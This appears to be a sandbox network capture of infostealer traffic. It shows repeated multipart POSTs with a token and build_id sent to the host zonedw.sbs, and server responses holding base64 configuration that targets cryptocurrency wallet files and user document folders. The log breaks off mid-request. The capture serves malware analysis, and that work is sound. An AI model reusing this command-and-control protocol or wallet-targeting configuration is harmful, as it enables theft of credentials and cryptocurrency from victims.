2024-12-14 11:57:48 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.4	50136	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:49 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----L68Y5XTJ5XBAIMOP8G4O User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:49 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4c 36 38 59 35 58 54 4a 35 58 42 41 49 4d 4f 50 38 47 34 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 38 59 35 58 54 4a 35 58 42 41 49 4d 4f 50 38 47 34 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 38 59 35 58 54 4a 35 58 42 41 49 4d 4f 50 38 47 34 4f 0d 0a 43 6f 6e 74 Data Ascii: ------L68Y5XTJ5XBAIMOP8G4OContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------L68Y5XTJ5XBAIMOP8G4OContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------L68Y5XTJ5XBAIMOP8G4OCont
2024-12-14 11:57:50 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:50 UTC	536	IN	Data Raw: 32 30 63 0d 0a 5a 47 6c 7a 66 43 56 45 55 6b 6c 57 52 56 39 47 53 56 68 46 52 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 61 6e 42 6e 4c 43 6f 75 61 6e 42 6c 5a 33 77 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 63 6d 56 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 61 6e 42 6e 4c 43 6f 75 61 6e 42 6c 5a 33 77 31 4d 48 78 6d 59 57 78 7a 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 64 58 4e 38 4a 56 56 54 52 56 4a 51 55 6b 39 47 53 55 78 46 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 71 63 47 63 73 4b 69 35 71 63 47 56 6e 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 78 45 5a 57 5a 68 64 57 78 30 66 43 56 45 54 30 4e 56 54 55 Data Ascii: 20cZGlzfCVEUklWRV9GSVhFRCVcfCoudHh0LCouanBnLCouanBlZ3w1MHxmYWxzZXwqd2luZG93cyp8cmV8JURSSVZFX1JFTU9WQUJMRSVcfCoudHh0LCouanBnLCouanBlZ3w1MHxmYWxzZXwqd2luZG93cyp8dXN8JVVTRVJQUk9GSUxFJVx8Ki50eHQsKi5qcGcsKi5qcGVnfDUwfGZhbHNlfCp3aW5kb3dzKnxEZWZhdWx0fCVET0NVTU

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	50143	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:52 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----0ZCJ5XBIEU37YU3WT26X User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:52 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 5a 43 4a 35 58 42 49 45 55 33 37 59 55 33 57 54 32 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 30 5a 43 4a 35 58 42 49 45 55 33 37 59 55 33 57 54 32 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 30 5a 43 4a 35 58 42 49 45 55 33 37 59 55 33 57 54 32 36 58 0d 0a 43 6f 6e 74 Data Ascii: ------0ZCJ5XBIEU37YU3WT26XContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------0ZCJ5XBIEU37YU3WT26XContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------0ZCJ5XBIEU37YU3WT26XCont
2024-12-14 11:57:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:53 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.4	50145	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:53 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HVAS26F37QIEUAAI5FUA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:53 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 56 41 53 32 36 46 33 37 51 49 45 55 41 41 49 35 46 55 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 48 56 41 53 32 36 46 33 37 51 49 45 55 41 41 49 35 46 55 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 48 56 41 53 32 36 46 33 37 51 49 45 55 41 41 49 35 46 55 41 0d 0a 43 6f 6e 74 Data Ascii: ------HVAS26F37QIEUAAI5FUAContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------HVAS26F37QIEUAAI5FUAContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------HVAS26F37QIEUAAI5FUACont
2024-12-14 11:57:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:54 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.4	50152	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:55 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JM79RI58YMYUAAS268YM User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:55 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4d 37 39 52 49 35 38 59 4d 59 55 41 41 53 32 36 38 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4d 37 39 52 49 35 38 59 4d 59 55 41 41 53 32 36 38 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4d 37 39 52 49 35 38 59 4d 59 55 41 41 53 32 36 38 59 4d 0d 0a 43 6f 6e 74 Data Ascii: ------JM79RI58YMYUAAS268YMContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------JM79RI58YMYUAAS268YMContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------JM79RI58YMYUAAS268YMCont
2024-12-14 11:57:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:56 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.4	50154	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:56 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----4W4EKNGVAAAIM7GDJ5PP User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:56 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 57 34 45 4b 4e 47 56 41 41 41 49 4d 37 47 44 4a 35 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 34 57 34 45 4b 4e 47 56 41 41 41 49 4d 37 47 44 4a 35 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 34 57 34 45 4b 4e 47 56 41 41 41 49 4d 37 47 44 4a 35 50 50 0d 0a 43 6f 6e 74 Data Ascii: ------4W4EKNGVAAAIM7GDJ5PPContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------4W4EKNGVAAAIM7GDJ5PPContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------4W4EKNGVAAAIM7GDJ5PPCont
2024-12-14 11:57:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:57 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.4	50161	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:58 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----U3E3EC2VAAAIEUKFK6XB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:58 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 55 33 45 33 45 43 32 56 41 41 41 49 45 55 4b 46 4b 36 58 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 55 33 45 33 45 43 32 56 41 41 41 49 45 55 4b 46 4b 36 58 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 55 33 45 33 45 43 32 56 41 41 41 49 45 55 4b 46 4b 36 58 42 0d 0a 43 6f 6e 74 Data Ascii: ------U3E3EC2VAAAIEUKFK6XBContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------U3E3EC2VAAAIEUKFK6XBContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------U3E3EC2VAAAIEUKFK6XBCont
2024-12-14 11:57:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:59 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.4	50165	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:59 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----58Y5FK6F37QIE37Q1NGL User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:59 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 38 59 35 46 4b 36 46 33 37 51 49 45 33 37 51 31 4e 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 35 38 59 35 46 4b 36 46 33 37 51 49 45 33 37 51 31 4e 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 35 38 59 35 46 4b 36 46 33 37 51 49 45 33 37 51 31 4e 47 4c 0d 0a 43 6f 6e 74 Data Ascii: ------58Y5FK6F37QIE37Q1NGLContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------58Y5FK6F37QIE37Q1NGLContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------58Y5FK6F37QIE37Q1NGLCont
2024-12-14 11:58:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:58:00 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.4	50167	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:58:01 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----YMGVS26F37QQIMO8YUKN User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:58:01 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 59 4d 47 56 53 32 36 46 33 37 51 51 49 4d 4f 38 59 55 4b 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 59 4d 47 56 53 32 36 46 33 37 51 51 49 4d 4f 38 59 55 4b 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 59 4d 47 56 53 32 36 46 33 37 51 51 49 4d 4f 38 59 55 4b 4e 0d 0a 43 6f 6e 74 Data Ascii: ------YMGVS26F37QQIMO8YUKNContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------YMGVS26F37QQIMO8YUKNContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------YMGVS26F37QQIMO8YUKNCont
2024-12-14 11:58:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:58:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:58:02 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.4	50169	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:58:02 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----LXLXT00ZU37YM7G47YCT User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:58:02 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4c 58 4c 58 54 30 30 5a 55 33 37 59 4d 37 47 34 37 59 43 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 4c 58 54 30 30 5a 55 33 37 59 4d 37 47 34 37 59 43 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 4c 58 54 30 30 5a 55 33 37 59 4d 37 47 34 37 59 43 54 0d 0a 43 6f 6e 74 Data Ascii: ------LXLXT00ZU37YM7G47YCTContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------LXLXT00ZU37YM7G47YCTContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------LXLXT00ZU37YM7G47YCTCont
2024-12-14 11:58:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:58:03 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.4	50171	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:58:04 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----89Z5F3EKF37YMYCB1NGD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1817 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:58:04 UTC	1817	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 38 39 5a 35 46 33 45 4b 46 33 37 59 4d 59 43 42 31 4e 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 38 39 5a 35 46 33 45 4b 46 33 37 59 4d 59 43 42 31 4e 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 38 39 5a 35 46 33 45 4b 46 33 37 59 4d 59 43 42 31 4e 47 44 0d 0a 43 6f 6e 74 Data Ascii: ------89Z5F3EKF37YMYCB1NGDContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------89Z5F3EKF37YMYCB1NGDContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------89Z5F3EKF37YMYCB1NGDCont
2024-12-14 11:58:05 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:58:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:58:05 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.4	50172	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:58:05 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBASJEKF37QIEU37QQI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1817 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:58:05 UTC	1817	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 41 53 4a 45 4b 46 33 37 51 49 45 55 33 37 51 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 53 4a 45 4b 46 33 37 51 49 45 55 33 37 51 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 53 4a 45 4b 46 33 37 51 49 45 55 33 37 51 51 49 0d 0a 43 6f 6e 74 Data Ascii: ------ECBASJEKF37QIEU37QQIContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------ECBASJEKF37QIEU37QQIContent-Disposition: form-data; 